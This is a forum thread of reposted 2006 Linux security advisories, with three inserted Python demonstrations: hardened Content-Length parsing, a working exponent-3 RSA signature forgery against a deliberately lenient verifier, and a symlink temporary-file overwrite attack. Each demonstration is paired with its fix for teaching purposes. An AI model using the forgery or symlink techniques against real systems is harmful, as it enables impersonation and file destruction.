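    return int(digits) if digits not in ("", "+", "-") else 0


def as_size_t(n, bits=32):
    """What the C code effectively did next: hand that signed result to
    malloc()/read() as size_t. -1 becomes 2**bits - 1 (assumed 32-bit here)."""
    return n & ((1 << bits) - 1)


def parse_content_length(value, max_len=1 << 20):
    """Hardened parse: RFC 7230 allows only 1*DIGIT (optional surrounding
    whitespace), so a sign, hex prefix or empty value is rejected outright,
    and an application ceiling (assumed 1 MiB) is applied before allocation."""
    s = value.strip(" \t")
    if not re.fullmatch(r"[0-9]{1,20}", s):
        raise ValueError("malformed Content-Length: %r" % value)
    n = int(s)
    if n > max_len:
        raise ValueError("Content-Length %d exceeds limit %d" % (n, max_len))
    return n


def read_body(stream, headers, max_len=1 << 20):
    """Allocate only after validation, and never trust the header over the
    number of bytes actually received."""
    n = parse_content_length(headers.get("Content-Length", "0"), max_len)
    body = stream.read(n)
    if len(body) != n:
        raise ValueError("short body: expected %d bytes, got %d" % (n, len(body)))
    return body


def demo_read_body():
    """Constructed requests: one well-formed, one whose body is shorter than
    the header claims. Returns (body, short_body_was_rejected)."""
    ok = read_body(io.BytesIO(b"hello"), {"Content-Length": "5"})
    try:
        read_body(io.BytesIO(b"hel"), {"Content-Length": "5"})
        short_rejected = False
    except ValueError:
        short_rejected = True
    return ok, short_rejected


if __name__ == "__main__":
    n = parse_content_length_vulnerable("-1")
    print("atoi-style parse of '-1':", n, "-> as size_t:", as_size_t(n))
    print("hardened parse of '42':", parse_content_length("42"))
    print(demo_read_body())
```

The important check is the one the vulnerable service skipped: validate the textual header against a strict grammar and a ceiling first, then size the buffer, then verify that the bytes that arrive match the declared length.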


----------



## eddie5659

Hiya

After a much needed long break, I've decided to bring this thread back. All previous ones can be found here:

http://forums.techguy.org/unix-linux/430115-linux-vulnerabilities.html

eddie


----------



## eddie5659

An integer overflow was discovered in the DOC file parser of the wv library. By tricking a user into opening a specially crafted MSWord (.DOC) file, remote attackers could execute arbitrary code with the user's privileges.

*Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
*

http://www.linuxsecurity.com/content/view/125526/170/

eddie


----------



## eddie5659

Stefan Esser discovered two buffer overflows in the htmlentities() and htmlspecialchars() functions. By supplying specially crafted input to PHP applications which process that input with these functions, a remote attacker could potentially exploit this to execute arbitrary code with the privileges of the application. (CVE-2006-5465) This update also fixes bugs in the chdir() and tempnam() functions, which did not perform proper open_basedir checks. This could allow local scripts to bypass intended restrictions.

*Affected versions

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
*

http://www.linuxsecurity.com/content/view/125548/170/

eddie


----------



## eddie5659

M. Joonas Pihlaja discovered that imlib2 did not sufficiently verify the validity of ARGB, JPG, LBM, PNG, PNM, TGA, and TIFF images. If a user were tricked into viewing or processing a specially crafted image with an application that uses imlib2, the flaws could be exploited to execute arbitrary code with the user's privileges.

*Affected versions

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
*

http://www.linuxsecurity.com/content/view/125565/170/

eddie


----------



## eddie5659

Derek Abdine discovered that the NVIDIA Xorg driver did not correctly verify the size of buffers used to render text glyphs. When displaying very long strings of text, the Xorg server would crash. If a user were tricked into viewing a specially crafted series of glyphs, this flaw could be exploited to run arbitrary code with root privileges.

*Affected versions

Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
*

http://www.linuxsecurity.com/content/view/125566/170/

eddie


----------



## eddie5659

An error was found in the RPM library's handling of query reports. In some locales, certain RPM packages would cause the library to crash. If a user was tricked into querying a specially crafted RPM package, the flaw could be exploited to execute arbitrary code with the user's privileges.

*Affected versions

Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.*

http://www.linuxsecurity.com/content/view/125567/170/

eddie


----------



## eddie5659

USN-376-1 provided an update to imlib2 to fix several security vulnerabilities. Unfortunately the update broke JPG file handling in certain situations. This update corrects this problem. We apologize for the inconvenience.

*Affected versions

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.*

http://www.linuxsecurity.com/content/view/125604/170/

eddie


----------



## eddie5659

Miloslav Trmac discovered a buffer overflow in texinfo's index processor. If a user is tricked into processing a .texi file with texindex, this could lead to arbitrary code execution with user privileges.

*Affected versions

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.*

http://www.linuxsecurity.com/content/view/125671/170/

eddie


----------



## eddie5659

The Linux kernel in our old Linux 2.4 kernel based distributions has been updated to fix various security issues and bugs.

*Products:

SuSE Linux Desktop 1.0
SuSE Linux Enterprise Server 8
SuSE Linux Openexchange Server 4
SUSE LINUX Retail Solution 8
SuSE Linux School Server
SuSE Linux Standard Server 8
UnitedLinux 1.0
*

http://www.linuxsecurity.com/content/view/125685/170/

eddie


----------



## eddie5659

This addresses an issue with the way screen handles UTF-8 character encoding that could allow screen to be crashed (or possibly code to be executed in the context of the screen user) if a specially crafted sequence of pseudo-UTF-8 characters is displayed within a screen session.

*Affected versions

Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2, and 11.0*

http://www.linuxsecurity.com/content/view/125568/170/

eddie


----------



## eddie5659

This release "includes a large number of new features, bug fixes and security enhancements." In particular, when the UTF-8 charset is selected there are buffer overflows in the htmlspecialchars() and htmlentities() that may be exploited to execute arbitrary code.

*Affected versions

Slackware 10.2 and 11.0*

http://www.linuxsecurity.com/content/view/125569/170/

eddie


----------



## eddie5659

The minimum OpenSSL version was raised to OpenSSL 0.9.7l and OpenSSL 0.9.8d to avoid exposure to known security flaws in older versions (these patches were already issued for Slackware). If you have not upgraded yet, get those as well to prevent a potentially exploitable security problem in named.

*Affected versions

Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2, and 11.0*

http://www.linuxsecurity.com/content/view/125608/170/

eddie


----------



## eddie5659

New Firefox and Thunderbird packages are available for Slackware 10.2 and 11.0 to fix security issues. In addition, a new Seamonkey package is available for Slackware 11.0 to fix similar issues.

*Affected versions

Slackware 10.2 and 11.0 *

http://www.linuxsecurity.com/content/view/125682/170/

eddie


----------



## eddie5659

Several flaws were found in the way Firefox processes certain malformed Javascript code. A malicious web page could cause the execution of Javascript code in such a way that could cause Firefox to crash or execute arbitrary code as the user running Firefox.

Several flaws were found in the way Firefox renders web pages. A malicious web page could cause the browser to crash or possibly execute arbitrary code as the user running Firefox.

A flaw was found in the way Firefox verifies RSA signatures. For RSA keys with exponent 3 it is possible for an attacker to forge a signature that would be incorrectly verified by the NSS library. Firefox as shipped trusts several root Certificate Authorities that use exponent 3. An attacker could have created a carefully crafted SSL certificate which would be incorrectly trusted when their site was visited by a victim.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/content/view/125627/170/

eddie


----------



## eddie5659

Texinfo is a documentation system that can produce both online information and printed output from a single source file.

A buffer overflow flaw was found in Texinfo's texindex command. An attacker could construct a carefully crafted Texinfo file that could cause texindex to crash or possibly execute arbitrary code when opened.

A flaw was found in the way Texinfo's texindex command creates temporary files. A local user could leverage this flaw to overwrite files the user executing texindex has write access to.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS (Advanced Server) version 2.1 - i386, ia64
Red Hat Linux Advanced Workstation 2.1 - ia64
Red Hat Enterprise Linux ES version 2.1 - i386
Red Hat Enterprise Linux WS version 2.1 - i386
Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/content/view/125630/170/

eddie


----------



## eddie5659

Several flaws were found in the way Thunderbird processes certain malformed Javascript code. A malicious HTML mail message could cause the execution of Javascript code in such a way that could cause Thunderbird to crash or execute arbitrary code as the user running Thunderbird.

Several flaws were found in the way Thunderbird renders HTML mail messages. A malicious HTML mail message could cause the mail client to crash or possibly execute arbitrary code as the user running Thunderbird.

A flaw was found in the way Thunderbird verifies RSA signatures. For RSA keys with exponent 3 it is possible for an attacker to forge a signature that would be incorrectly verified by the NSS library. Thunderbird as shipped trusts several root Certificate Authorities that use exponent 3. An attacker could have created a carefully crafted SSL certificate which would be incorrectly trusted when their site was visited by a victim. This flaw was previously thought to be fixed in Thunderbird 1.5.0.7, however Ulrich Kuehn discovered the fix was incomplete.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/content/view/125629/170/

eddie


----------



## eddie5659

Several flaws were found in the way SeaMonkey processes certain malformed Javascript code. A malicious web page could cause the execution of Javascript code in such a way that could cause SeaMonkey to crash or execute arbitrary code as the user running SeaMonkey.

Several flaws were found in the way SeaMonkey renders web pages. A malicious web page could cause the browser to crash or possibly execute arbitrary code as the user running SeaMonkey.

A flaw was found in the way SeaMonkey verifies RSA signatures. For RSA keys with exponent 3 it is possible for an attacker to forge a signature that would be incorrectly verified by the NSS library. SeaMonkey as shipped trusts several root Certificate Authorities that use exponent 3. An attacker could have created a carefully crafted SSL certificate which would be incorrectly trusted when their site was visited by a victim. This flaw was previously thought to be fixed in SeaMonkey 1.0.5, however Ulrich Kuehn discovered the fix was incomplete.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS (Advanced Server) version 2.1 - i386, ia64
Red Hat Linux Advanced Workstation 2.1 - ia64
Red Hat Enterprise Linux ES version 2.1 - i386
Red Hat Enterprise Linux WS version 2.1 - i386
Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/content/view/125628/170/

eddie
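An added example covering the exponent-3 RSA signature flaw in the Firefox, Thunderbird and SeaMonkey posts above (editor's code; it is not NSS code and does not reproduce the exact NSS bug). The failure class is a PKCS#1 v1.5 verifier that walks past `00 01 FF..FF 00`, reads the DigestInfo and hash at that offset, and never checks that the encoding fills the whole block. With e = 3 an attacker puts the hash near the top of the block, leaves a long free tail, and takes an integer cube root: no private key is needed. The block below shows the lenient and the strict verifier side by side and forges a signature that only the lenient one accepts. The modulus `N` is a constructed 2048-bit placeholder, not a real key, and the message is constructed; SHA-1 is used because it is what the DigestInfo prefix here encodes.

```python
import hashlib
import hmac

# Constructed stand-in for a 2048-bit RSA modulus with public exponent 3.
# It is not a real key: the forgery below never needs the private factors.
N = (1 << 2047) | 0x10001
E = 3

# DER prefix of a SHA-1 DigestInfo (RFC 3447, section 9.2, note 1).
SHA1_DIGESTINFO = bytes.fromhex("3021300906052b0e03021a05000414")


def byte_len(n):
    return (n.bit_length() + 7) // 8


def emsa_pkcs1_v15(msg, k):
    """Full EMSA-PKCS1-v1_5 encoding: 00 01 FF..FF 00 DigestInfo || H(msg)."""
    t = SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def rsa_public(sig, n, e):
    """RSA verification primitive: recover the encoded block from the signature."""
    return pow(int.from_bytes(sig, "big"), e, n).to_bytes(byte_len(n), "big")


def verify_strict(msg, sig, n=N, e=E):
    """Correct check: the recovered block must equal the expected encoding
    byte for byte, so no unchecked tail can exist."""
    return hmac.compare_digest(rsa_public(sig, n, e), emsa_pkcs1_v15(msg, byte_len(n)))


def verify_lenient(msg, sig, n=N, e=E):
    """Buggy parser of the class described above: walk 00 01 FF.. 00, read
    DigestInfo||hash at that offset, and ignore whatever follows."""
    em = rsa_public(sig, n, e)
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i + 1 >= len(em) or em[i] != 0x00:
        return False
    i += 1
    t = SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    return em[i:i + len(t)] == t          # BUG: trailing bytes are never examined


def icbrt_ceil(x):
    """Smallest integer s with s**3 >= x (binary search on plain ints)."""
    lo, hi = 0, 1 << (x.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** 3 < x:
            lo = mid + 1
        else:
            hi = mid
    return lo


def forge(msg, n=N, pad_len=8):
    """Exponent-3 forgery against verify_lenient, using only the public key."""
    k = byte_len(n)
    t = SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    prefix = b"\x00\x01" + b"\xff" * pad_len + b"\x00" + t   # short padding on purpose
    garbage = k - len(prefix)
    # Target block = prefix followed by zeros. Taking the ceiling cube root gives
    # s with s**3 - target < 3*s**2, far below 256**garbage, so s**3 keeps the
    # prefix intact and only the tail the lenient parser ignores is disturbed.
    target = int.from_bytes(prefix + b"\x00" * garbage, "big")
    s = icbrt_ceil(target)
    assert s ** 3 < n, "cube must not wrap modulo n"
    return s.to_bytes(k, "big")


if __name__ == "__main__":
    msg = b"constructed message"                  # constructed input
    sig = forge(msg)
    print("lenient verifier accepts forgery:", verify_lenient(msg, sig))
    print("strict verifier accepts forgery: ", verify_strict(msg, sig))
```

The fix is the same one the vendors shipped: compare the recovered block against the complete expected encoding rather than parsing it, which makes the length of the padding part of what is verified. The check also belongs anywhere certificates are validated, since a CA with e = 3 in the trust store is what turned this from a library bug into a TLS impersonation.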


----------



## eddie5659

A flaw was discovered in the way Ruby's CGI module handles certain multipart/form-data MIME data. If a remote attacker sends a specially crafted multipart-form-data request, it is possible to cause the ruby CGI script to enter an infinite loop, causing a denial of service.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS (Advanced Server) version 2.1 - i386
Red Hat Enterprise Linux ES version 2.1 - i386
Red Hat Enterprise Linux WS version 2.1 - i386
Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/content/view/125646/170/

eddie


----------



## eddie5659

Several flaws were found in Wireshark's HTTP, WBXML, LDAP, and XOT protocol dissectors. Wireshark could crash or stop responding if it read a malformed packet off the network.

A single NULL byte heap based buffer overflow was found in Wireshark's MIME Multipart dissector. Wireshark could crash or possibly execute arbitrary code as the user running Wireshark.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS (Advanced Server) version 2.1 - i386, ia64
Red Hat Linux Advanced Workstation 2.1 - ia64
Red Hat Enterprise Linux ES version 2.1 - i386
Red Hat Enterprise Linux WS version 2.1 - i386
Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/content/view/125672/170/

eddie


----------



## eddie5659

The Hardened-PHP Project discovered an overflow in the PHP htmlentities() and htmlspecialchars() routines. If a PHP script used the vulnerable functions to parse UTF-8 data, a remote attacker sending a carefully crafted request could trigger the overflow and potentially execute arbitrary code as the 'apache' user.

*Relevant releases/architectures:

Red Hat Application Stack v1 for Enterprise Linux AS (v.4) - i386, x86_64
Red Hat Application Stack v1 for Enterprise Linux ES (v.4) - i386, x86_64
*

http://www.linuxsecurity.com/content/view/125683/170/

eddie


----------



## eddie5659

Miloslav Trmac discovered a buffer overflow in texinfo. This issue can cause texi2dvi or texindex to crash when processing a carefully crafted file.

*Affected versions

2006.0, 2007.0, Corporate 3.0, Corporate 4.0*

http://www.linuxsecurity.com/content/view/125645/170/

eddie


----------



## eddie5659

A vulnerability in the privilege separation functionality in OpenSSH was discovered, caused by an incorrect checking for bad signatures in sshd's privsep monitor. As a result, the monitor and the unprivileged process can get out of sync. The OpenSSH team indicated that this bug is not known to be exploitable in the absence of additional vulnerabilities.

*Affected versions

2006.0, 2007.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0*

http://www.linuxsecurity.com/content/view/125650/170/

eddie


----------



## eddie5659

An error in gnuplot was causing it to fail with a segmentation fault whenever the user attempted to produce a graphical plot via the default 'x11' term. The updated package corrects this error and allows graphical plotting via X11.

*Affected: 2007.0*

http://www.linuxsecurity.com/content/view/125678/170/

eddie


----------



## eddie5659

A number of security vulnerabilities have been discovered and corrected in the latest Mozilla Firefox program, version 1.5.0.8. This update provides the latest Firefox to correct these issues.

*Affected versions

2007.0, Corporate 3.0, Corporate 4.0
*

http://www.linuxsecurity.com/content/view/125679/170/

eddie


----------



## eddie5659

There were some problems with the menu system in Mandriva Linux 2007. Some menu categories were not displayed or properly translated, and editing the menus with the GNOME menu editor (alacarte) was not working. This update fixes these problems.

*Affected: 2007.0
*

http://www.linuxsecurity.com/content/view/125680/170/

eddie


----------



## eddie5659

A number of security vulnerabilities have been discovered and corrected in the latest Mozilla Thunderbird program, version 1.5.0.8. This update provides the latest Thunderbird to correct these issues.

*Affected: 2007.0, Corporate 3.0
*

http://www.linuxsecurity.com/content/view/125681/170/

eddie


----------



## eddie5659

The Ical package in Mandriva Linux 2007 fails to run due to old code that does not work with current versions of TCL. Additionally, the application did not appear in the menu and the URL was obsolete. This updated package fixes these issues.

*Affected: 2007.0
*

http://www.linuxsecurity.com/content/view/125688/170/

eddie


----------



## eddie5659

Screen contains an error in its UTF-8 character handling code that would allow a remote Denial of Service or possibly the remote execution of arbitrary code.

*Affected packages

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-misc/screen < 4.0.3 >= 4.0.3
*

http://www.linuxsecurity.com/content/view/125554/170/

eddie


----------



## eddie5659

An integer overflow flaw in the Qt pixmap handling could possibly lead to a Denial of Service or the remote execution of arbitrary code.

*Affected packages

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 x11-libs/qt < 4.1.4-r2 >= 4.1.4-r2
>= 3.3.6-r4
*

http://www.linuxsecurity.com/content/view/125574/170/

eddie


----------



## eddie5659

The NVIDIA binary graphics driver is vulnerable to a local privilege escalation through an X session.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 x11-drivers/nvidia-drivers < 1.0.8776 >= 1.0.8776
< 1.0-8762
*

http://www.linuxsecurity.com/content/view/125617/170/

eddie


----------



## eddie5659

Bugzilla is vulnerable to cross-site scripting, script injection, and request forgery.

*Affected packages

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-apps/bugzilla < 2.18.6 >= 2.18.6
*

http://www.linuxsecurity.com/content/view/125676/170/

eddie


----------



## eddie5659

An incorrect seteuid() call could allow an FTP user to access some files or directories that would normally be inaccessible.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-ftp/ftpd < 0.17-r4 >= 0.17-r4
*

http://www.linuxsecurity.com/content/view/125687/170/

eddie


----------



## eddie5659

M. Joonas Pihlaja discovered that imlib2 did not sufficiently verify the validity of ARGB, JPG, LBM, PNG, PNM, TGA, and TIFF images. If a user were tricked into viewing or processing a specially crafted image with an application that uses imlib2, the flaws could be exploited to execute arbitrary code with the user's privileges. Fedora Extras versions earlier than the versions mentioned above are vulnerable to this problem, upgrade to fix this vulnerability.

*Version: 1.2.1-2 [FE 3 4], 1.3.0-3 [FE 5 6 devel]
*

http://www.linuxsecurity.com/content/view/125656/170/

eddie


----------



## eddie5659

Mozilla Firefox is an open source Web browser. Several flaws were found in the way Firefox processes certain malformed Javascript code. A malicious web page could cause the execution of Javascript code in such a way that could cause Firefox to crash or execute arbitrary code as the user running Firefox. Several flaws were found in the way Firefox renders web pages. A malicious web page could cause the browser to crash or possibly execute arbitrary code as the user running Firefox.

*Product : Fedora Core 5
Name : firefox
Version : 1.5.0.8
*

http://www.linuxsecurity.com/content/view/125654/170/

eddie


----------



## eddie5659

New to this release is our SELinux Control Console. This WebTool module gives you greater control over EnGarde's kernel-level security policies by allowing you to monitor security audit logs; enable and disable policy enforcement; download new policies to your server; trigger a relabeling of the file system.

The release also contains our new context-sensitive WebTool help system and upgrades to many major applications including Apache, Postfix, and Snort.

*(Version 3.0, Release 10).*

http://www.linuxsecurity.com/content/view/125612/170/

eddie


----------



## eddie5659

Steve Rigler discovered that the PAM module for authentication against LDAP servers processes PasswordPolicyReponse control messages incorrectly, which might lead to an attacker being able to login into a suspended system account.

http://www.linuxsecurity.com/content/view/125542/170/

eddie


----------



## eddie5659

It was discovered that the Ingo email filter rules manager performs insufficient escaping of user-provided data in created procmail rules files, which allows the execution of arbitrary shell commands.

http://www.linuxsecurity.com/content/view/125549/170/

eddie


----------



## eddie5659

Marco d'Itri discovered that thttpd, a small, fast and secure webserver, makes use of insecure temporary files when its logfiles are rotated, which might lead to a denial of service through a symlink attack.

http://www.linuxsecurity.com/content/view/125557/170/

eddie
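An added example for the thttpd log-rotation post above and the texindex temporary-file post earlier in the thread (editor's code, not from either project). Both flaws are the same pattern: a temporary file with a predictable name is opened with `O_CREAT` but without `O_EXCL`, so a local user who pre-creates that name as a symlink gets the privileged process to truncate and write whatever the link points at. The block plants such a symlink in a scratch directory, shows the unsafe open writing through it, shows the hardened open refusing, and ends with the `mkstemp` pattern that rotation code should use. The file names and contents are constructed for the demonstration.

```python
import errno
import os
import tempfile

# Mirrors the thttpd log-rotation and texindex flaws above: a predictable
# temporary path opened without O_EXCL follows a symlink planted by a local
# user and overwrites whatever the link points at.


def open_tmp_unsafe(path):
    """Vulnerable pattern: predictable name, follows symlinks, truncates."""
    return open(path, "w")          # O_WRONLY|O_CREAT|O_TRUNC, no O_EXCL


def open_tmp_safe(path):
    """Hardened: O_EXCL refuses any existing name (a symlink included),
    O_NOFOLLOW closes the remaining race where available, and mode 0600
    keeps other users out of the file that is created."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    return os.fdopen(os.open(path, flags, 0o600), "w")


def demo_symlink_attack(workdir):
    """Returns (victim content after the unsafe open,
                whether the safe open was blocked,
                victim content after the safe open attempt)."""
    victim = os.path.join(workdir, "victim.conf")         # constructed target
    with open(victim, "w") as f:
        f.write("original\n")
    # Attacker step: pre-create the predictable temp name as a symlink.
    link = os.path.join(workdir, "rotate.tmp")             # constructed predictable name
    os.symlink(victim, link)

    with open_tmp_unsafe(link) as f:                       # writes through the symlink
        f.write("clobbered\n")
    with open(victim) as f:
        after_unsafe = f.read()

    try:
        with open_tmp_safe(link) as f:
            f.write("never written\n")
        safe_blocked = False
    except OSError as exc:                                 # EEXIST (or ELOOP with O_NOFOLLOW)
        safe_blocked = exc.errno in (errno.EEXIST, errno.ELOOP)
    with open(victim) as f:
        after_safe = f.read()
    return after_unsafe, safe_blocked, after_safe


def run_demo():
    with tempfile.TemporaryDirectory() as d:
        return demo_symlink_attack(d)


def private_tmp_demo():
    """What rotation code should do instead: let mkstemp pick an unpredictable
    name and create it atomically with O_EXCL and mode 0600.
    Returns (content read back, permission bits of the created file)."""
    with tempfile.TemporaryDirectory() as d:
        fd, path = tempfile.mkstemp(prefix="rotate-", dir=d)
        with os.fdopen(fd, "w") as f:
            f.write("data\n")
        mode = os.stat(path).st_mode & 0o777
        with open(path) as f:
            return f.read(), mode


if __name__ == "__main__":
    print(run_demo())
    print(private_tmp_demo())
```

The decisive flag is `O_EXCL`: the kernel then refuses to reuse any existing name, which is what defeats a pre-planted link, and `mkstemp` adds an unpredictable name on top so there is nothing for the attacker to pre-create in the first place.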


----------



## eddie5659

Several remote vulnerabilities have been discovered in PHP, a server-side, HTML-embedded scripting language, which may lead to the execution of arbitrary code.

http://www.linuxsecurity.com/content/view/125592/170/

eddie


----------



## eddie5659

Several remote vulnerabilities have been discovered in phpMyAdmin, a program to administrate MySQL over the web.

http://www.linuxsecurity.com/content/view/125670/170/

eddie


----------



## eddie5659

Various problems have been fixed in the network analyzer Ethereal (now called Wireshark), most of them leading to crashes of the ethereal program.

*Affected Products:*
Novell Linux POS 9
Open Enterprise Server
SUSE LINUX 10.1
SUSE LINUX 10.0
SUSE LINUX 9.3
SuSE Linux Enterprise Server 8
SuSE Linux Openexchange Server 4
SUSE LINUX Retail Solution 8
SuSE Linux School Server
SuSE Linux Standard Server 8
SUSE SLED 10
SUSE SLES 10
SUSE SLES 9
UnitedLinux 1.0

http://www.linuxsecurity.com/content/view/125759/170/

eddie


----------



## eddie5659

Two security problems were found in the GraphicsMagick tool set which are also present in ImageMagick.

*Affected Products:*
Novell Linux Desktop 9
SLE SDK 10
SLES SDK 9
SUSE LINUX 10.1
SUSE LINUX 10.0
SUSE LINUX 9.3
SuSE Linux Desktop 1.0
SuSE Linux Openexchange Server 4
SuSE Linux School Server
SuSE Linux Standard Server 8
SUSE SLED 10

http://www.linuxsecurity.com/content/view/125760/170/

eddie


----------



## eddie5659

Several security related problems have been discovered in Mozilla and derived products such as Mozilla Firefox.

*Package: mozilla-firefox*

http://www.linuxsecurity.com/content/view/125758/170/

eddie


----------



## eddie5659

Various buffer overflows in htmlentities / htmlspecialchars internal routines could be used to crash the PHP interpreter or potentially execute code, depending on the PHP application used.

*Affected Products:*
Novell Linux POS 9
Open Enterprise Server
SLE SDK 10
SUSE LINUX 10.1
SUSE LINUX 10.0
SUSE LINUX 9.3
SuSE Linux Enterprise Server 8
SuSE Linux Openexchange Server 4
SUSE LINUX Retail Solution 8
SuSE Linux School Server
SuSE Linux Standard Server 8
SUSE SLES 10
SUSE SLES 9
UnitedLinux 1.0

http://www.linuxsecurity.com/content/view/125770/170/

eddie


----------



## eddie5659

Updated openssh packages that fix an authentication flaw are now available for Red Hat Enterprise Linux 3 and 4. This update has been rated as having low security impact by the Red Hat Security Response Team.

*Relevant releases/architectures:*

Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64

http://www.linuxsecurity.com/content/view/125772/170/

eddie


----------



## eddie5659

Updated nss_ldap packages that fix a security flaw are now available for Red Hat Enterprise Linux 4. This update has been rated as having moderate security impact by the Red Hat Security Response Team.

*Relevant releases/architectures:*

Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Enterprise Linux Desktop version 4 - i386, x86_64
Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64

http://www.linuxsecurity.com/content/view/125771/170/

eddie


----------



## eddie5659

An unspecified vulnerability in OpenLDAP allows remote attackers to cause a denial of service (daemon crash) via a certain combination of SASL Bind requests that triggers an assertion failure in libldap. Packages have been patched to correct this issue.

http://www.linuxsecurity.com/content/view/125767/170/

eddie


----------



## eddie5659

Two denial of service vulnerabilities have been found in the OpenSSH server. CVE-2006-4924: The sshd support for ssh protocol version 1 does not properly handle duplicate incoming blocks. This could allow a remote attacker to cause sshd to consume significant CPU resources leading to a denial of service. CVE-2006-5051: A signal handler race condition could potentially allow a remote attacker to crash sshd and could theoretically lead to the ability to execute arbitrary code.

http://www.linuxsecurity.com/content/view/125773/170/

eddie


----------



## eddie5659

Tavis Ormandy discovered that libpng did not correctly calculate the size of sPLT structures when reading an image. By tricking a user or an automated system into processing a specially crafted PNG file, an attacker could exploit this weakness to crash the application using the library.

*Affected software:*

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

